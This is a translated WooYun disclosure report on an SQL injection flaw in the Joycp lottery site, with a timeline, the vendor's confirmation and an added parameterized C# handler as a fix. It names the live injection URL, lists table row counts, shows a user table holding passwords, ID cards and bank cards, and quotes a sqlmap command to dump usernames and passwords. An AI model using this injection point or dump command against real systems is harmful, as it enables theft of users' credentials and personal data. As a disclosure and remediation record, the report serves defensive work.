
Vulnerability summary

Defect ID: wooyun-2015-0131165

Title: SQL injection on a Joycp (卓彩网) endpoint leaks member data (millions of records)

Vendor: 北京中民卓彩科技发展有限公司 (Beijing Zhongmin Zhuocai Technology Development Co., Ltd.)

Author: huoge

Submitted: 2015-08-04 21:29

Fixed: 2015-09-21 11:14

Published: 2015-09-21 11:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-04: Details sent to the vendor; awaiting vendor handling
2015-08-07: Vendor confirmed; details visible to the vendor only
2015-08-17: Details opened to core white hats and relevant domain experts
2015-08-27: Details opened to regular white hats
2015-09-06: Details opened to intern white hats
2015-09-21: Details opened to the public

Brief description:

Injection

Detailed description:

Joycp (卓彩网) - buy lottery tickets online; welfare lottery, sports lottery and football lottery draw results
Joycp (www.joycp.net) takes serving China's lottery industry as its mission and is committed to providing the country's hundreds of millions of lottery players with rich, comprehensive, safe and reliable phone- and mobile-based ticket purchasing services.
Injection point:

http://www.joycp.com/Interface/CMS/GetCmsNanGe.ashx?lName=2021&rowNuma=0&rowNumb=3


The amount of data is considerable:

Database: LOTTERYDB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| TSP_LOG | 25261730 |
| B2B_LOG | 10266975 |
| USER_ACCOUNTDETAIL | 5365455 |
| TICKET_TSP_SEQUENCE | 2911384 |
| TICKET_ORDERTICKET | 2873540 |
| TICKET_ORDERTICKETEXTEND | 2779005 |
| USER_VISIT_LOG | 2436777 |
| TICKET_TOGETHERABORTION | 2358759 |
| DEPOSIT_LOG | 1963851 |
| TICKET_ORDER | 1185729 |
| TICKET_ORDEREXTEND | 1185724 |
| USER_ACCOUNT | 1154543 |
| USER_INFOEXTEND | 1111853 |
| USER_INFO | 1111847 |
| AWARD_INFO | 1111244 |
| JOYCP_CARD | 1052010 |
| DEPOSIT_DETAIL | 1032650 |
| HERO_ERRORLOG | 626514 |
| USER_EXPERIENCEDETAIL | 447701 |
| SCORE_VERSUS | 310778 |
| MONITOR_LOG | 121707 |
| TICKET_ACCOUNTDETAIL | 98284 |
| HERO_SQLLOG | 97979 |
| B2B_ACCOUNTDETAIL | 78126 |
| TOGETHER_USER | 77043 |
| USER_NOTICE | 70033 |
| USER_EVENTINFO | 65007 |
| AWARDISSUE_FOOTBALL | 58118 |
| B2B_ORDERTICKET | 37822 |
| B2B_ORDERTICKETEXTEND | 37822 |
| MONITOR_SMS | 28505 |
| USER_AWARDINFO | 28102 |
| SCORE_MATCH | 23777 |
| TOGETHER_PROJECT | 22177 |
| FOOTBALL_TEAM | 16028 |
| USER_DRAWMONEY | 13965 |
| CMS_ARTICLETYPE | 11889 |
| CMS_ARTICLE | 11597 |
| TOGETHER_GAMESOCRE | 7774 |
| TICKET_ACCOUNTDSHARE | 6915 |
| HERO_TICKETORDERID | 4747 |
| TOGETHER_SCOREANALYZE | 3560 |
| PARTNERS_ACCOUNTDETAIL | 2590 |
| USER_FOLLOWER | 2585 |
| TICKETORDERPACKAGE | 2494 |
| USER_NOTICECONFIG | 1970 |
| PARTNERS_INFO | 1523 |
| USER_PACKAGE | 1188 |
| AWARD_SALE_ADDRESS | 1160 |
| USER_OPERATE_LOG | 960 |
| HERO_MANUAL_WINDATA | 445 |
| ADMIN_MENUPERMISSION | 346 |
| DICT_GAMETYPE | 337 |
| DICT_TSP_CMDCODE | 235 |
| HERO_TEMP_TICKETTSPID | 171 |
| JOYCP_ACTIVITY | 109 |
| DICT_TSP_CMDCODE_DATABAK | 102 |
| CMS_CATEGORY | 75 |
| USER_TOGETHEFOLLOWCONFIG | 75 |
| ADMIN_MENU | 70 |
| USER_TOGETHEFOLLOWDETAIL | 70 |
| USER_BROADBANDFOLLOW | 60 |
| DICT_DEPOSIT_SUBCHANEL | 59 |
| ADMIN_PERMISSION | 55 |
| TSP_GAMECONFIG | 51 |
| USER_TOGETHEFOLLOWCOUNT | 51 |
| GUARANTEEPROFIT | 45 |
| FOOTBALL_LEAGUE | 44 |
| DICT_USER_ACOUNTTYPE | 38 |
| DICT_GAMENAME | 32 |
| AWARD_FOREIGNDATA_CONFIG | 28 |
| HERO_TICKET_ORDERTICKETBAK | 27 |
| HERO_TICKET_ORDERTICKETEXTENDK | 27 |
| AWARD_ISSUENOW | 26 |
| CMS_AUTHOR | 26 |
| DICT_DEPOSIT_CHANEL | 26 |
| CMS_SOURCE | 21 |
| HERO_DINGTOU | 21 |
| TSP_INFO | 21 |
| PACKAGE_CONFIG | 20 |
| TSP_ACCOUNTDETAIL | 20 |
| HERO_JOYCPCARDAGENT | 19 |
| ADMIN_USERINFO | 17 |
| DICT_SCORESTATUS | 10 |
| ADMIN_ROLE | 9 |
| B2B_GAMECONFIG | 9 |
| DICT_USEREXPERIENCE | 8 |
| DICT_USERNOTICETYPE | 8 |
| AWARD_FOREIGNDATA_GAMECONFIG | 7 |
| B2B_INFO | 6 |
| DICT_B2B_ACCOUNTTYPE | 6 |
| DICT_ORDERMODE | 6 |
| DICT_TICKET_STATUS | 6 |
| DICT_ORDERTYPE | 5 |
| DICT_SMSTYPE | 4 |
| PACKAGETYPE | 4 |
| DICT_ORDERORIGIN | 3 |
| DICT_ORDERSTATUS | 3 |
| DICT_PARTNERS_ACCOUNTTYPE | 3 |
| USER_BROADCASTDATAANNALS | 3 |
| DICT_MSGTYPE | 2 |
| CMS_KEYWORDVALUE | 1 |
| DICT_TSP_ACCOUNTTYPE | 1 |
| DICT_USER_OPERATE_TYPE | 1 |
| USER_BROADCASTDATA | 1 |
+--------------------------------+---------+


USER_INFO table structure:
USER_INFO 1111847 // row count

Database: LOTTERYDB
Table: USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| "\x08ARTNERID" |
| BANKADDRESS | VARCHAR2 |
| BANKCARD | VARCHAR2 |
| BANKNAME | VARCHAR2 |
| CHECK |
| CHECKEMAIL | NUMBER |
| CONSUMMATE | NUMBER |
| CREATETIME | DATE |
| DRAWPWD | VARCHAR2 |
| EMAIL | VARCHAR2 |
| IDCARD | VARCHAR2 |
| IDCARD_STATUS | NUMBER |
| IDCARDTYPE | NUMBER |
| MOBILE | VARCHAR2 |
| PWD | VARCHAR2 |
| REALNAME | VARCHAR2 |
| SECURITYANSWER | VARCHAR2 |
| SECURITYQUESTION | VARCHAR2 |
| STATUS | NUMBER |
| USERID | NUMBER |
| USERNAME | VARCHAR2 |
+------------------+----------+


I picked two columns at random and dumped a few rows:
-D LOTTERYDB -T USER_INFO -C "USERNAME,PWD" --start 1111800 --stop 1111847 --dump

[Screenshot: QQ截图20150802221959.png]

Proof of vulnerability:

Remediation:

Copyright notice: please credit huoge@乌云 (WooYun) when reposting.
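Added example, not code from the author or the vendor: a handler for the endpoint at the injection point written with bind variables instead of string concatenation, with the request values type-checked before they reach the database. It assumes an ASP.NET .ashx handler over Oracle via the ODP.NET managed driver (the column types above are Oracle's VARCHAR2/NUMBER), that lName selects a CMS category and rowNuma/rowNumb bound a row window; CMS_ARTICLE is a table the page lists, but its columns CATEGORYID, TITLE and CREATETIME and the "LotteryDb" connection-string name are hypothetical.

```csharp
// Added example (not the site's or the author's code). Assumed: ASP.NET .ashx handler,
// Oracle via ODP.NET, hypothetical CMS_ARTICLE columns and a "LotteryDb" connection string.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Web;
using System.Web.Script.Serialization;
using Oracle.ManagedDataAccess.Client;
public class GetCmsNanGe : IHttpHandler
{
    public bool IsReusable { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        // Validate at the boundary: all three parameters are integers in the reported URL,
        // so anything else is rejected before it touches SQL; the window is capped too.
        int lName, rowA, rowB;
        if (!int.TryParse(ctx.Request["lName"], out lName) ||
            !int.TryParse(ctx.Request["rowNuma"], out rowA) ||
            !int.TryParse(ctx.Request["rowNumb"], out rowB) ||
            lName < 0 || rowA < 0 || rowB < rowA || rowB - rowA > 100)
        {
            ctx.Response.StatusCode = 400;
            return;
        }
        // The statement text is a constant; request values travel only as bind variables,
        // so they can never alter the structure of the query.
        const string sql =
            "SELECT TITLE FROM (" +
            " SELECT a.TITLE, ROW_NUMBER() OVER (ORDER BY a.CREATETIME DESC) rn" +
            " FROM CMS_ARTICLE a WHERE a.CATEGORYID = :lName" +
            ") WHERE rn > :rowA AND rn <= :rowB";
        var titles = new List<string>();
        string cs = ConfigurationManager.ConnectionStrings["LotteryDb"].ConnectionString;
        using (var conn = new OracleConnection(cs))
        using (var cmd = new OracleCommand(sql, conn))
        {
            cmd.BindByName = true;
            cmd.Parameters.Add(":lName", OracleDbType.Int32).Value = lName;
            cmd.Parameters.Add(":rowA", OracleDbType.Int32).Value = rowA;
            cmd.Parameters.Add(":rowB", OracleDbType.Int32).Value = rowB;
            conn.Open();
            using (var rd = cmd.ExecuteReader())
                while (rd.Read()) titles.Add(rd.GetString(0));
        }
        ctx.Response.ContentType = "application/json";
        ctx.Response.Write(new JavaScriptSerializer().Serialize(titles));
    }
}
```

The same pattern applies to every handler that takes request input: parse to the expected type first, then bind, so a payload such as the one reported here is only ever treated as a value.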


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-07 11:12

Vendor reply:

CNVD has confirmed the reported issue and has notified the site's operating organization through the site's publicly listed contact channels.

Latest status:

None yet